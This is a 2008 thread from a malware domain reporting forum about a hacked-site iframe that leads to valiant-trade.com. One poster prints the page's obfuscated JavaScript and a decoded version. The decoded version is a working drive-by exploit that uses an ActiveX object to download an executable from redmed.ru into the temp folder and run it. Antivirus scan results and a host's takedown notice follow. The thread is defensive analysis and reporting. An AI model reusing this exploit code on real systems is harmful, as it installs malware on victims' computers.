Malware Domain List

Malware Related => Malicious Domains => Topic started by: cconniejean on February 28, 2008, 02:14:28 am

Title: valiant-trade.com
Post by: cconniejean on February 28, 2008, 02:14:28 am
Have a few sites that have been hacked and this script tag with JavaScript coding which converts to:

Code: [Select]
<iframe src="hxxp://valiant-trade.com/images/" scrolling="no" frameborder="0" width=0 height=0></iframe>
I have this in my host files and LinkScanner Pro still closes my browser window.
Title: Re: valiant-trade.com
Post by: MysteryFCM on February 28, 2008, 07:27:07 am
Interesting content it's got there;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.2.6 Results
Source code for: [quote]hxxp://valiant-trade.com/images/[/quote]
Server IP: 72.29.85.190 [ star.host-care.com ]
Date: 28 February 2008
Time: 07:20:36:20
*****************************************************************
<script language=JavaScript>
function diromo(kqac){
var koe=0,dwma=10,csj=0,kqac="vLlc7rCdp7vbNvgU8jFuaMmu7iC6Y0FuNNb6OjsdioAlEL9KJBycLjs2StFdx"+kqac,sdqx=8+3-dwma+1,soqz=9,siaq=4,mahb=48,mam,bsg=Array(mahb+15,siaq+1,soqz+25,53,21,43,55,30,11,25,0,0,0,0,0,0,24,57,35,44,56,32,12,0,27,18,9,54,26,2,22,3,14,33,46,38,58,51,23,29,62,6,4,0,0,0,0,36,0,39,40,48,49,17,28,60,8,15,59,50,41,42,16,19,20,52,31,45,47,37,10,1,13,61,7),pszc=kqac.length,deaz=71-1,bga=952+deaz,dwv,dpw=0,j;
for(fead=(Math.ceil(pszc/bga))*(sdqx+2),j=fead>>(dwma-8);j>0;j--){dwv='';for(res=Math.min(pszc,bga)*(sdqx+dwma-8),mam=res>>2;mam>0;mam--,pszc--){nmaw=(kqac.charCodeAt(dpw++)-48)*(dwma-6);csj|=(bsg[nmaw>>2])<<koe;if(koe){dwv+=String.fromCharCode(170^csj&255);koe-=(dwma-8);csj>>=(dwma-2)}else{koe=(dwma-4)}}document.write(dwv)};
}diromo("0ykx0guhMXkftfXJBycLjx2p7vbvmhUrofk7ifdZ5@Uf0W6WVFdMP@qaMm2vmh68Bs2hBykfVguh2FK8UWdhYAlEmb2vTfdJ0ydioC6Zkfd@rfKdBhUotWUHBgkh7iQiHgUz0Fd7aWghTgq9OsdxOx26oh68Hg6irJk@tF61zAlEmb2vTfkziF6o6CEOYAlEmb2VrvbNN@KJBycLjxuaMmu1vgU8jFuaMmuhVCUo5@dZHfd8jguhKF6r6W61oCEOYJ2p7vbN2FKp7vbNkfd@rC2ZtgdirJ2FiyKxtxk8BhuaMm2vLAcZ5y675b2ZtgdirJ2PiWKnHfUnBb27isKirJ2MiCUP0Fdhmh68Hg6irJ2HRJ2p7vbNNhU1Bydp7vbvL9KJBycLjs2StFdx0ykx0guhMXkftfXJBycLjx2p7vbvmhUrofk7ifdZ5bUJrgcfiWUMP@qaMm2vkyk@5hK1rC6i5xkV2hKhYAlEmb2ftFKvLfd8tyuhvx2e7vbvmh68Bs2h5WkOHCqirJ2aifkhYAlEmb2ftFKvTWdPixqiiyuhPP2e7vbvmh68Bs2iVgUo0yKYrJK1rC6i5xkw2@dhYh29VF2e7vbvmh68Bs2MrFKZzCc7rl61jgqn0gqw2hdhYh27B@_aMm2vkyk@5b6@0gkV2DjhYbd1tgKe7vbvmh68Bs2Fif6nrJ2HRJ2e7vbvmh68Bs2F6fkhByuhmh2e7vbvmh68Bs2PBsqf6guhvi2e7vbvmhK1rC6i5xkV2DUhYh2@B@EhIF2e7vbvmhkLagcY8yUV2CKJiCdI0fEiVgUo0yKYzh2FB@EhTx2e7vbvmbczBxdw8C6Vvgd@ofcMjWE@Vgd70CKhzh2iB@EhTx2e7vbvmb6@0gkVTxKitfEhmx2w2bdhYAlEmb2PBsqf6guPBsqf6fEh7P2e7vbvmb6@0gkVTxKitfEhNF2w2hKhYAlEmb2ftFKv2Fcr0gczjgu7ByU8zh2iB@Eh2x2e7vbvmbU@8x6x5DuvTFKIUWUvYb2hLP2w2bDhYAlEmb2F6fkhBs2VmhkLagcY8yUwkfUJBFKwvgd@ofcMjWEF6fkhBWEhOg6iigdPzAlE7vbvmDcF5bEZtF6O6gk7VFKZRCKLoXkz0g2VkfUJBFKOYylEmb2v2yU70xKZzAlEmb2Vrvbvmh68Bs2xBWK8rlU1ag6z0Fd7ohU1Byd9zi2FiyKxtxk8BDyZXCdirgUZjWKdBbUoaxqY6Fqh7iQftCdr0f_aMm2vPFUvv@U@ayk87JUO6xqOYylEmb2ftFKvTWUzrFdLjC2VmbU1ag6z0Fd7o@k@0gk70gjY0gdioC6M2@dhOgUJjx2OYAlEmb276gdzoCKPo@KijyT7jxKOBg670CEhPCUhLh276gdzoCKPBDEe7vbvmh68Bs2F0fc15DuvK@kYaycPOJTRiJal6@_aMm2vkyk@5bKIHfKv7l2xXAaf7harR7SxYAlEmb2ftFKvkf61aC2Vm@BzRASR5AQoK@_aMm2vkyk@5D6rtfUv7l2xv9S5rbSLS7Be7vbvmh68Bs2i6sK75DuvKbS7k7T@K@_aMm2vkyk@5h6H8fKv7l2xPAj9k9Be7vbvmDlEmb276gdzoCKPo@KijyT7jxKOBg670CEhSCd8aWKOjF2YkgUwVfEL8sd9zhUWVfkwXy686fEi6sK7zh6H8fKOYAlEmb27ByqvYylEmb2ftFKvTWdPixqiis2Vmh2@0gkzB@_vkyk@5bUx8gdY6ykv7l2hSs6hYAlEmb2YVgkH5DuvLfd8tWEh7CdhYAlEmb2ftFKvTx6YixcL6s2Vmh2PBF2emh68Bs2h8CKYBycO5Duv2DkPVF2e7vbvmh68Bs2wOfKWBgdJ5DuvTWUzrFdLjFQlByU8jyUuBFciaC6M2CcLHFKOifE7UsdoOCKWzh2Z2@EP6CczHf68zb61jgqn0gqY2h2OYAlEmb2ftFKvPFU1VCc@jC2Vmh2zB@EhSx2wLfd8tWEh2J2e7vbvmh68Bs2iHFk8tW6f5DuvTFKIUWUw2b0X5i2e7vbvmh68Bs27VCUoOyUo5Duv2@XM0F2emh68Bs2LBg6@iFcJ5Duv2bdYB@_aMm2vkyk@5Dk@Hg6Z6WKv7l2hRRKLHF2emh68Bs2Wrfd8ax6z5Duv2DcJtF2emh68Bs2iaydo6gKW5Duv2b6OVFdhYAlEmb2ftFKvKyUfUWcYjs2Vmb6xrgdZ5sUZSPKitC6iVPkG0fk78b61jgqn0gqwmxkrBycGafEhIh2wRFKY0xdWaWEWrfd8ax6zzDU9rgqxtW6Y2h2OYAlEmb2ftFKvkFkJ5W678s2Vmb6xrgdZ5sUZSPKitC6iVPkG0fk78DcFVfdMBsUw2hQhYDUYBgkH6x6Y2h2OYAlEmb2FBfkL6s6Io@dL0FdM2@jtji2Y2bc7jx2w2bKnNh2w2@Q@0CUzB@EhXCUZ2y61PgdhYh286F2w2DU9V@K7VFKO0fK1StK1Bs6LmJS12@Eh2@EhTFk86xQL8CK4RguwOfKWBgdJBbQFtCd90gEe7vbvmhUhaCKWjsqZSyUZjCEOYAlEmb2wOfKWBgdJob6o5yUv7l2HYAlEmb2wOfKWBgdJo@dL0FdMP@_aMm2vYFc96xkzaFQyByc70CEFBfkL6s6IohKiasK1ofKiB7dPiyEe7vbvm@6zVgk9Uydv7l2h2CcLHFKOiF2w2hQi8yUhYAlEmb2ftFKvTs6P8W6LUC2Vmb6xrgdZ5sUZSPKitC6iVPkG0fk78h2AaFKO5s6OofUZkXcY0fXoas6irfAhOgUJjx2Y2h2O7vbvm@6zVgk9Uydv7l27jsUI6sKFohTriCdP50k78CE7jsUI6sKFo@jijWXL0fkOtCdCVCdP0FKM2AEYKyd1tfKfrgEe7vbvm@cGaW6hrfkZS0kf0C01UXcY0CEWrfd8ax6zHhSOYAlEmb2W0F6fzCd7o@XM0CdY0Rqiag670CEWrfd8ax6zi@_aMm2v7ylEmb2JtC6J8CEii@qVrvbvmD3aMT3aMmu1SWk@iCK7oAlEL9QhVCUooAlEL9QMjydYoAlELlDXrRAp7vbNvXj5jPuaMmuXiR0S0Pu_VC6vk7droCUNNb0BjtAtoAlEL9Q20XTRoAlETtci5hKity6ias6ijC20BtAvKyk95hd1js2FVg6ZjC21oC278gc95@KiBx6iBxQaMmuhBxuN2FKpLlDD5hd1asc8jgUV2hd1asc8jgUhIAlERRK8aCciVDSZSJQ9Rl2A0FKf0FKvRC6vmrd@js2ImAlEL9QbVRjUoAlEL9Q2j0ASoJ");
</script>

.... decodes to;

Code: [Select]
<html>
<head>
<title></title>
<script Language="JavaScript">
  function gvuwwon(){
   var bravo="bravo";
   document.forms["fyqgqba"].elements["dyszlgz"].value=bravo;
   dcmivyg();
  }
</script>
</head>
<body onload="gvuwwon();">
<br>
<form name="fyqgqba">
  <input  name="dyszlgz" type="hidden" value="11">
</form>
 <script Language="JavaScript">
  function dcmivyg(){
  var romtepb="r";
  var loaq="x";
  var bpcilxe="Mic";
  var todyzey="I";
  var eoeyuql=romtepb+"o"+"so";
  var hmrnkht=todyzey+"n"+"t";
  var trea="E"+loaq;
  var fiwz="11";
  var fgcbr=" ";
  var drxvg="X";
  romtepb="e"+"r"+"n";
  bpcilxe=bpcilxe+eoeyuql+"f"+"t";
  hmrnkht=hmrnkht+romtepb+"e"+"t";
  trea=trea+"p"+"l";
  drxvg=drxvg+"M";
  trea=trea+"o"+"r";
  var bjueimd=trea+"e"+"r";
  drxvg = drxvg + "L"+"H";
  fgcbr = bpcilxe+fgcbr+hmrnkht+fgcbr+bjueimd;

  if (navigator.appName!=fgcbr){
   return;
  }
  var grsa=document.forms["fyqgqba"].elements["dyszlgz"].value;
  if (grsa!=fiwz){
  var tgmmnpd = document.createElement("object");
  tgmmnpd.setAttribute("id","tgmmnpd");
  var feko = 'clsid:BD96C';
  var pxls = '556-65A3';
  var fwoc = '-11D0-9';
  var uuag = '83A-00C';
  var ewpt = '04FC2';
  var vqhs = '9E36';
 
  tgmmnpd.setAttribute("classid",feko+pxls+fwoc+uuag+ewpt+vqhs);
  try {
  var todyzey = "ream"; var dghmlwa = "st";
  loaq = loaq+"ml";
  var tvlyjpw = "db"; var bhplrii = "ado";
  var kjswbmc = tgmmnpd.CreateObject(bhplrii+tvlyjpw+"."+dghmlwa+todyzey,"");
  var ifoohrd = "m"+"s"+loaq+"2";
  var elbaqwv = drxvg+"TTP";
  var todyzey = "She"; var pburijc = "ll";
  var arlunws = "Appl"; var wmoasvm = "ica"; var esmygqw = "tion";
  var wevvklt = tgmmnpd.CreateObject(todyzey+pburijc+"."+arlunws+wmoasvm+esmygqw,"");
  var fbcpwtx = tgmmnpd.CreateObject(ifoohrd+"."+elbaqwv,"");
  fbcpwtx.open("GET","htt"+"p:/"+"/redm"+"ed.ru/im"+"ag"+"es/stories/Sport002/"+""+"dbaw.php?a=kjswbmc",false);
  fbcpwtx.send();
  kjswbmc.type = 1;
  kjswbmc.open();
  kjswbmc.Write(fbcpwtx.responseBody);
  wmoasvm = "bhplrii"+".exe";
  var ttdxwpf = tgmmnpd.CreateObject("Scripting.FileSystemObject","")
  wmoasvm = ttdxwpf.BuildPath(ttdxwpf.GetSpecialFolder(2),wmoasvm);
  kjswbmc.SaveToFile(wmoasvm,2);
  wevvklt.ShellExecute(wmoasvm);

  }
  catch(e){}
  }
}
</script>
</body>
</html>
<HTML>
<HEAD>
<TITLE>Not Found</TITLE>
</HEAD>
The requested URL was not found on this server.
<br><br><HR noshade="noshade">
Apache/1.3.31 Server at Port 80
</BODY>
</HTML>

Which shows the malicious file is then downloaded from;

Quote
hxxp://redmed.ru/images/stories/Sport002/dbaw.php?a=kjswbmc

.. and saved as;

%temp%\bhplrii.exe

I'll snag a copy of the file and run it through VT
Title: Re: valiant-trade.com
Post by: MysteryFCM on February 28, 2008, 07:38:08 am
Code: [Select]
AhnLab-V3 2008.2.28.2 2008.02.28 -
AntiVir 7.6.0.67 2008.02.27 HEUR/Malware
Authentium 4.93.8 2008.02.28 -
Avast 4.7.1098.0 2008.02.27 -
AVG 7.5.0.516 2008.02.27 -
BitDefender 7.2 2008.02.28 -
CAT-QuickHeal 9.50 2008.02.26 (Suspicious) - DNAScan
ClamAV None 2008.02.28 -
DrWeb 4.44.0.09170 2008.02.27 -
eSafe 7.0.15.0 2008.02.28 Suspicious File
eTrust-Vet 31.3.5571 2008.02.28 -
Ewido 4.0 2008.02.27 -
FileAdvisor 1 2008.02.28 -
Fortinet 3.14.0.0 2008.02.28 -
F-Prot 4.4.2.54 2008.02.27 W32/Downloader-Web-based!Maximus
F-Secure 6.70.13260.0 2008.02.28 Suspicious:W32/Malware!Gemini
Ikarus T3.1.1.20 2008.02.28 Trojan-Downloader.Win32.Agent.bew
Kaspersky 7.0.0.125 2008.02.28 Trojan-Downloader.Win32.Small.ird
McAfee 5240 2008.02.28 -
Microsoft 1.3301 2008.02.27 -
NOD32v2 2907 2008.02.28 -
Norman 5.80.02 2008.02.27 Suspicious_F.gen
Panda 9.0.0.4 2008.02.27 Suspicious file
Prevx1 V2 2008.02.28 Heuristic: Suspicious Browser Help Object
Rising 20.33.30.00 2008.02.28 -
Sophos 4.27.0 2008.02.28 Troj/Dowdec-Fam
Sunbelt 3.0.906.0 2008.02.28 VIPRE.Suspicious
Symantec 10 2008.02.28 -
TheHacker 6.2.9.229 2008.02.25 -
VBA32 3.12.6.2 2008.02.27 -
VirusBuster 4.3.26:9 2008.02.27 Packed/FSG
Webwasher-Gateway 6.6.2 2008.02.28 Heuristic.Malware
Title: Re: valiant-trade.com
Post by: JohnC on February 28, 2008, 11:46:47 am
Thank you both, this will appear in this list when it updates next.
Title: Re: valiant-trade.com
Post by: MysteryFCM on February 28, 2008, 05:56:57 pm
HostDime have notified me that the server owner has taken valiant-trade.com down :)

Quote
Ray F.   
 
 
 Posted On: 28 Feb 2008 12:43 PM

--------------------------------------------------------------------------------
Steven,

The domain has been taken off line by the server owner. If it pops back up in our net block. Please reply to this ticket so we can keep a record of the recurrence.

Cheers,
-Ray F.

HostDime Abuse/Security Team
 
Title: Re: valiant-trade.com
Post by: sowhat-x on February 28, 2008, 06:03:21 pm
Lol,you contacted them and they took it down? Viva -> 1-0!  :D
Title: Re: valiant-trade.com
Post by: MysteryFCM on February 28, 2008, 06:09:09 pm
hehe 1/2 site's I've contacted them about ....... the other one is still online :( (second site is uk-passport-info.com, which has a malicious script at the bottom of the site's code, they've contacted the server owner about it and if they don't get a response from them, will deal with it themselves)
Title: Re: valiant-trade.com
Post by: cconniejean on February 28, 2008, 10:32:28 pm
So cool, thank you, thank you.
Title: Re: valiant-trade.com
Post by: MysteryFCM on February 28, 2008, 11:37:33 pm
My pleasure :)